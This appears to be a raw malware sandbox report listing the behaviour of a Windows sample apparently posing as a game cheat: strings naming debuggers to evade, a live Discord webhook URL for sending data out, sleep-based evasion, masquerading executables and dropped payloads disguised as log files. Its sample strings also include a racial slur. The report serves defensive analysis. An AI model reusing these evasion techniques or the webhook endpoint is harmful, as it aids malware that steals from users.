                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: gh3zRWl4or.exeBinary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- |##COMBO_%02D*UNKNOWN ITEM*%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
                                Source: gh3zRWl4or.exeBinary or memory string: OLLYDBG.EXE
                                Source: gh3zRWl4or.exeBinary or memory string: X64DBG.EXE
                                Source: gh3zRWl4or.exeBinary or memory string: WINDBG.EXE
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: F40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 1AF40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 970000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 1A6C0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: AB0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 1A500000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1310000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 2A50000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: CE0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1A810000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: B80000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1600000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B410000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: C00000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 2760000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeMemory allocated: 1A950000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 11F0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1ACB0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9028
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8772
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeDropped PE file which has not been started: C:\Users\user\Desktop\aowVPJEW.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\fnSuHmrC.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeDropped PE file which has not been started: C:\Users\user\Desktop\BegQTYoT.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeDropped PE file which has not been started: C:\Users\user\Desktop\uNKjQhPt.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZcXEVMnO.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\XkTUfoHN.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\OPvxZeSl.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\ASIzYbXK.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\sozKoiId.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\HiOQLkRz.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\KAbPIEds.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\vpYzbqhQ.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeDropped PE file which has not been started: C:\Users\user\Desktop\dZblWXPP.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeDropped PE file which has not been started: C:\Users\user\Desktop\TqIVmuJi.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\xSuJhsEU.logJump to dropped file
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-15270
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeAPI coverage: 7.5 %
                                Source: C:\Windows\Speech\physmeme.exe TID: 3964Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4040Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 712Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Edge\msedge.exe TID: 368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 9028 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 336Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2980Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4716Thread sleep count: 8772 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 1964Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 5104Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 5916Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 2848Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 1552Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 2040Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 712Thread sleep time: -922337203685477s >= -30000s
